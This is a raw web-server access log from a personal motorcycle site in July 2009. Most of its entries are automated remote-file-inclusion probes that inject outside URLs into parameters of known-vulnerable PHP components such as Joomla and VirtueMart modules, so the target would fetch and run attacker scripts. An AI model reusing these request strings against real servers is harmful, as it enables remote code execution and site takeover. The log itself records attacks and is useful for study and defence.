121.78.116.209 - - [26/Jul/2009:13:12:05 -0700] "GET /logs/access_081110.log%20%20//modules/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.87.105 - - [26/Jul/2009:13:12:58 -0700] "GET /bikes/dteel/2008_02_15/?S=D HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.96.148.228 - - [26/Jul/2009:13:13:21 -0700] "GET /logs/access_081104.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tor-zum-glueck.net//pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.96.148.228 - - [26/Jul/2009:13:13:21 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tor-zum-glueck.net//pit-id.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
80.96.148.228 - - [26/Jul/2009:13:13:22 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tor-zum-glueck.net//pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.232.54.48 - - [26/Jul/2009:13:14:36 -0700] "GET /logs/access_090121.log////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:13:15:38 -0700] "GET /logs/access_080320.log//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:13:15:40 -0700] "GET /logs/access_080201.log//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.87.105 - - [26/Jul/2009:13:17:01 -0700] "GET /bikes/WeSTOC08/dmulk_WeSTOC08_II.gpx HTTP/1.0" 200 2702746 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.121.111.100 - - [26/Jul/2009:13:17:42 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tor-zum-glueck.net//v6-i.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.100 - - [26/Jul/2009:13:17:42 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tor-zum-glueck.net//v6-i.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.100 - - [26/Jul/2009:13:17:42 -0700] "GET /logs/access_090518.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tor-zum-glueck.net//v6-i.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.100 - - [26/Jul/2009:13:17:47 -0700] "GET /logs/access_090323.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tor-zum-glueck.net//v6-i.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.100 - - [26/Jul/2009:13:17:50 -0700] "GET /logs/access_090707.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tor-zum-glueck.net//v6-i.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.100 - - [26/Jul/2009:13:17:50 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tor-zum-glueck.net//v6-i.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.100 - - [26/Jul/2009:13:17:50 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tor-zum-glueck.net//v6-i.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.100 - - [26/Jul/2009:13:17:50 -0700] "GET /logs/access_080526.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tor-zum-glueck.net//v6-i.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:13:23:03 -0700] "GET /logs/access_080410.log//modules/Forums/admin/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:13:23:03 -0700] "GET /modules/Forums/admin/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:13:23:03 -0700] "GET /logs//modules/Forums/admin/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:13:23:13 -0700] "GET /logs/access_080331.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.69.162 - - [26/Jul/2009:13:23:14 -0700] "GET /logs/access_090503.log//index.php?seccion=http://tor-zum-glueck.net//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.69.162 - - [26/Jul/2009:13:23:14 -0700] "GET /logs//index.php?seccion=http://tor-zum-glueck.net//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:13:23:16 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.2; http://dmulk.com/blog" "dmulk.com"
64.157.4.43 - - [26/Jul/2009:13:23:17 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
72.32.69.162 - - [26/Jul/2009:13:23:19 -0700] "GET /logs/access_090306.log//index.php?seccion=http://tor-zum-glueck.net//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:13:23:21 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:13:23:28 -0700] "GET /logs/access_080919.log//modules/Forums/admin/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.69.162 - - [26/Jul/2009:13:23:31 -0700] "GET /index.php?seccion=http://tor-zum-glueck.net//id1.txt? HTTP/1.1" 200 20990 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.223.106 - - [26/Jul/2009:13:24:04 -0700] "GET /logs/access_080924.log/index.php?get=http://strima.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.223.106 - - [26/Jul/2009:13:24:04 -0700] "GET /logs/index.php?get=http://strima.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:13:24:05 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
201.232.54.48 - - [26/Jul/2009:13:24:12 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 200 21136 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.223.106 - - [26/Jul/2009:13:24:19 -0700] "GET /index.php?get=http://strima.org/id.txt??? HTTP/1.1" 200 20980 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.223.106 - - [26/Jul/2009:13:24:21 -0700] "GET /logs/access_080107.log/index.php?get=http://strima.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.86.49.115 - - [26/Jul/2009:13:24:53 -0700] "GET /logs/access_080924.log/index.php?get=http://strima.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.86.49.115 - - [26/Jul/2009:13:24:53 -0700] "GET /logs/index.php?get=http://strima.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:13:24:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
216.220.51.60 - - [26/Jul/2009:13:24:55 -0700] "GET /logs/access_080924.log/index.php?get=http://strima.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.220.51.60 - - [26/Jul/2009:13:24:55 -0700] "GET /logs/index.php?get=http://strima.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:13:24:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
77.86.49.115 - - [26/Jul/2009:13:25:03 -0700] "GET /logs/access_080107.log/index.php?get=http://strima.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.220.51.60 - - [26/Jul/2009:13:25:07 -0700] "GET /logs/access_080107.log/index.php?get=http://strima.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.86.49.115 - - [26/Jul/2009:13:25:10 -0700] "GET /index.php?get=http://strima.org/id.txt??? HTTP/1.1" 200 20980 "-" "libwww-perl/5.805" "www.dmulk.com"
216.220.51.60 - - [26/Jul/2009:13:25:11 -0700] "GET /index.php?get=http://strima.org/id.txt??? HTTP/1.1" 200 20980 "-" "libwww-perl/5.79" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:13:25:26 -0700] "GET /logs/access_080410.log%20%20//modules/Forums/admin/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.111.100 - - [26/Jul/2009:13:25:26 -0700] "GET /logs/access_090206.log%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tor-zum-glueck.net//v6-i.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:13:25:46 -0700] "GET /logs/access_080919.log%20%20//modules/Forums/admin/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.113.10 - - [26/Jul/2009:13:25:59 -0700] "GET /modules/Forums/admin/errors.php?error=http://svarovsky.net/pics/files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.113.10 - - [26/Jul/2009:13:26:00 -0700] "GET /logs//modules/Forums/admin/errors.php?error=http://svarovsky.net/pics/files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.113.10 - - [26/Jul/2009:13:26:00 -0700] "GET /logs/access_080410.log//modules/Forums/admin/errors.php?error=http://svarovsky.net/pics/files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.113.10 - - [26/Jul/2009:13:26:08 -0700] "GET /logs/access_080919.log//modules/Forums/admin/errors.php?error=http://svarovsky.net/pics/files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.69.162 - - [26/Jul/2009:13:26:46 -0700] "GET /logs/access_090503.log%20%20//index.php?seccion=http://tor-zum-glueck.net//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.69.162 - - [26/Jul/2009:13:26:52 -0700] "GET /logs/access_090306.log%20%20//index.php?seccion=http://tor-zum-glueck.net//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.113.10 - - [26/Jul/2009:13:27:13 -0700] "GET /logs/access_080410.log%20%20//modules/Forums/admin/errors.php?error=http://svarovsky.net/pics/files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.113.10 - - [26/Jul/2009:13:27:23 -0700] "GET /logs/access_080919.log%20%20//modules/Forums/admin/errors.php?error=http://svarovsky.net/pics/files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.147.127.214 - - [26/Jul/2009:13:28:38 -0700] "GET /bikes/occcb/ebayisapi.dll.htm HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Fedora Core 6) FC6 GnomeDE [ru]" "dmulk.com"
80.96.148.228 - - [26/Jul/2009:13:28:43 -0700] "GET /logs/access_081110.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tor-zum-glueck.net//pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.224.65 - - [26/Jul/2009:13:29:07 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.porn-free.org/images/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.232.224.65 - - [26/Jul/2009:13:29:07 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.porn-free.org/images/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.232.224.65 - - [26/Jul/2009:13:29:07 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.porn-free.org/images/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.66.59.50 - - [26/Jul/2009:13:30:51 -0700] "GET /logs/access_080924.log/index.php?get=http://strima.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.66.59.50 - - [26/Jul/2009:13:30:51 -0700] "GET /logs/index.php?get=http://strima.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:13:30:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
208.66.59.50 - - [26/Jul/2009:13:31:08 -0700] "GET /index.php?get=http://strima.org/id.txt??? HTTP/1.1" 200 20980 "-" "libwww-perl/5.79" "www.dmulk.com"
208.66.59.50 - - [26/Jul/2009:13:31:10 -0700] "GET /logs/access_080107.log/index.php?get=http://strima.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.87.105 - - [26/Jul/2009:13:31:46 -0700] "GET /bikes/dteel/2008_07_03/?D=A HTTP/1.0" 200 835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.232.224.65 - - [26/Jul/2009:13:31:52 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.porn-free.org/images/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.87.105 - - [26/Jul/2009:13:32:06 -0700] "GET /logs/access_090503.log HTTP/1.0" 200 4306138 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.232.224.65 - - [26/Jul/2009:13:32:48 -0700] "GET /logs/access_080519.log%20%20//include/bbs.lib.inc.php?site_path=http://www.porn-free.org/images/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:36:50 -0700] "GET /errors.php?error=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.232.224.65 - - [26/Jul/2009:13:38:20 -0700] "GET /logs/access_080519.log//include/bbs.lib.inc.php?site_path=http://www.porn-free.org/images/fx29id1.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:41:01 -0700] "GET /logs/access_081124.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:41:01 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:41:01 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:41:01 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:41:19 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:41:20 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:41:20 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:41:20 -0700] "GET /logs/access_081124.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.14.113.10 - - [26/Jul/2009:13:49:50 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://paulowtf.webs.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.113.10 - - [26/Jul/2009:13:49:50 -0700] "GET /logs/access_090424.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://paulowtf.webs.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.113.10 - - [26/Jul/2009:13:49:50 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://paulowtf.webs.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.113.10 - - [26/Jul/2009:13:50:01 -0700] "GET /logs/access_090121.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://paulowtf.webs.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:51:34 -0700] "GET /logs/access_090510.log/errors.php?error=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:51:35 -0700] "GET /errors.php?error=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:51:35 -0700] "GET /logs/errors.php?error=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:51:55 -0700] "GET /errors.php?error=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:06 -0700] "GET /logs/access_090408.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:06 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:06 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:30 -0700] "GET /logs/access_090408.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:30 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:30 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:53:39 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:53:39 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:53:39 -0700] "GET /logs/access_090408.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:43 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:43 -0700] "GET /logs/access_090408.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:45 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:46 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:46 -0700] "GET /logs/access_090408.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:53:46 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:53:46 -0700] "GET /logs/access_090408.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:53:46 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:46 -0700] "GET /logs/access_090408.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:47 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:53:47 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:53:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:53:47 -0700] "GET /logs/access_090408.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:53:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:53:47 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:53:47 -0700] "GET /logs/access_090408.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:48 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:48 -0700] "GET /logs/access_090408.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:48 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:49 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:49 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:53:49 -0700] "GET /logs/access_090408.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
